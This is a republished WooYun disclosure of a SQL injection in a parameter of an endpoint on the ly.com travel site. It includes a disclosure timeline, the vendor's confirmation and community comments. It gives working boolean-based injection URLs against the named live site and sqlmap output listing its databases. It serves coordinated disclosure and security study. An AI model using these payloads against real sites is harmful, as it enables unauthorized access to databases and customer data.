同程旅游网主站的一处SQL注入

admin
admin
admin
139615
文章
114
评论
2017年4月29日10:55:31评论299 views字数 221阅读0分44秒阅读模式
摘要

2016-04-13: 细节已通知厂商并且等待厂商处理中
2016-04-14: 厂商已经确认,细节仅向厂商公开
2016-04-24: 细节向核心白帽子及相关领域专家公开
2016-05-04: 细节向普通白帽子公开
2016-05-14: 细节向实习白帽子公开
2016-05-29: 细节向公众公开

漏洞概要 关注数(41) 关注此漏洞

缺陷编号: WooYun-2016-196030

漏洞标题: 同程旅游网主站的一处SQL注入

相关厂商: 苏州同程旅游网络科技有限公司

漏洞作者: 李长歌

提交时间: 2016-04-13 23:27

公开时间: 2016-05-29 01:40

漏洞类型: SQL注射漏洞

危害等级: 高

自评Rank: 20

漏洞状态: 厂商已经确认

漏洞来源:www.wooyun.org ,如有疑问或需要帮助请联系

Tags标签: php+字符类型注射 注射技巧

7人收藏

漏洞详情

披露状态:

2016-04-13: 细节已通知厂商并且等待厂商处理中
2016-04-14: 厂商已经确认,细节仅向厂商公开
2016-04-24: 细节向核心白帽子及相关领域专家公开
2016-05-04: 细节向普通白帽子公开
2016-05-14: 细节向实习白帽子公开
2016-05-29: 细节向公众公开

简要描述:

主站为什么没有WAF呢。

详细说明:

http://www.ly.com/bustour/json/GetOpenedCityList.html?OrdTypeId=165&typeIds=155,156,157)%20and%20104=104--%20&iid=0.16461771167814732 有数据

同程旅游网主站的一处SQL注入

http://www.ly.com/bustour/json/GetOpenedCityList.html?OrdTypeId=165&typeIds=155,156,157)%20and%20104=105--%20&iid=0.16461771167814732 没有数据

同程旅游网主站的一处SQL注入

放入SQLmap中注入

同程旅游网主站的一处SQL注入

漏洞证明:

部分测试的数据

code 区域 
[22:09:27] [INFO] retrieved: TcShortTourResource
 [22:10:52] [INFO] retrieved: master
 [22:11:11] [INFO] retrieved: tempdb
 [22:11:32] [INFO] retrieved: model
 [22:11:54] [INFO] retrieved: msdb
 [22:12:19] [INFO] retrieved: TcShortTourDCResource
 [22:13:28] [INFO] retrieved: TcShortTourLog
 [22:14:21] [INFO] retrieved: TcShortTourOrder
 [22:15:19] [INFO] retrieved: TcShortTourResource
 [22:16:34] [INFO] retrieved: TcShortTourShop
 [22:17:35] [INFO] retrieved: TcShortTourStatement
 ...

同程旅游网主站的一处SQL注入

修复方案:

typeIds参数进行过滤下,加入WAF

版权声明:转载请注明来源 李长歌@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:18

确认时间:2016-04-14 01:31

厂商回复:

感谢关注同程旅游,WAF这些天确实临时下线了。

最新状态:

暂无

漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价

  1. 2016-04-13 23:28 | _Thorns ( 普通白帽子 | Rank:1754 漏洞数:269 | 以大多数人的努力程度之低,根本轮不到去拼...)

    1

    大表哥,你要不要这么厉害。

  2. 2016-04-13 23:48 | 紫霞仙子 同程旅游网主站的一处SQL注入 ( 普通白帽子 | Rank:2302 漏洞数:307 | 没好团队,啥都干不成!!!)

    1

    额。。。没waf,表哥怎么看?

  3. 2016-04-14 00:07 | onpu ( 普通白帽子 | Rank:396 漏洞数:67 )

    1

    估计厂商回复,好尴尬吖,刚关waf你就来

  4. 2016-04-14 00:16 | Aasron ( 普通白帽子 | Rank:905 漏洞数:163 | raw_input("你知道我要输入什么?"))

    1

    waf....

  5. 2016-04-14 06:52 | qhwlpg ( 普通白帽子 | Rank:260 漏洞数:64 | http://sec.tuniu.com)

    1

    牛逼

  6. 2016-04-14 08:19 | 大师兄 ( 实习白帽子 | Rank:31 漏洞数:8 | 每日必关注乌云)

    1

    WAF为什么要下线?换一种?

  7. 2016-04-14 08:30 | whynot ( 普通白帽子 | Rank:678 漏洞数:136 | 为你解冻冰河 为你放弃世界有何不可)

    1

    waf这几天有事..大表哥,你要不要这么厉害。

  8. 2016-04-14 09:01 | 幻老头儿 ( 普通白帽子 | Rank:285 漏洞数:63 | 新手上路。)

    1

    waf是谁?

  9. 2016-04-14 09:13 | Taro ( 普通白帽子 | Rank:349 漏洞数:86 | 走向最远的方向,哪怕前路迷茫;抱着最大的...)

    1

    为啥大家总是在waf关闭的时候挖到漏洞呢

  10. 2016-04-14 12:16 | 纯情 ( 路人 | Rank:19 漏洞数:3 | 站在人生的顶端,俯视生命的千姿百态。)

    1

    内幕

  11. 2016-05-09 17:31 | 李长歌 ( 普通白帽子 | Rank:426 漏洞数:44 | /)

    0

    刚收了给发的京东卡,同程安全还是挺不错的,感谢。

  12. 2016-05-15 21:20 | qhwlpg ( 普通白帽子 | Rank:260 漏洞数:64 | http://sec.tuniu.com)

    0

    运气真好~

  13. 2016-05-29 08:55 | 我真的是开开哥 ( 路人 | Rank:4 漏洞数:1 | 不敢写。)

    0

    请教一下,这个是火狐的什么插件?

  14. 2016-05-29 09:04 | Dusk ( 实习白帽子 | Rank:35 漏洞数:20 )

    0

    正赶上!!

  15. 2016-05-29 10:28 | Mr_Java ( 普通白帽子 | Rank:170 漏洞数:43 | 高三党,当,档,裆!)

    0

    6666666

  16. 2016-05-29 11:29 | theone ( 实习白帽子 | Rank:50 漏洞数:9 | hodor,hodor)

    0

    @我真的是开开哥 hackbar

  17. 2016-05-30 22:03 | 我真的是开开哥 ( 路人 | Rank:4 漏洞数:1 | 不敢写。)

    0

    @theone 感谢!

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin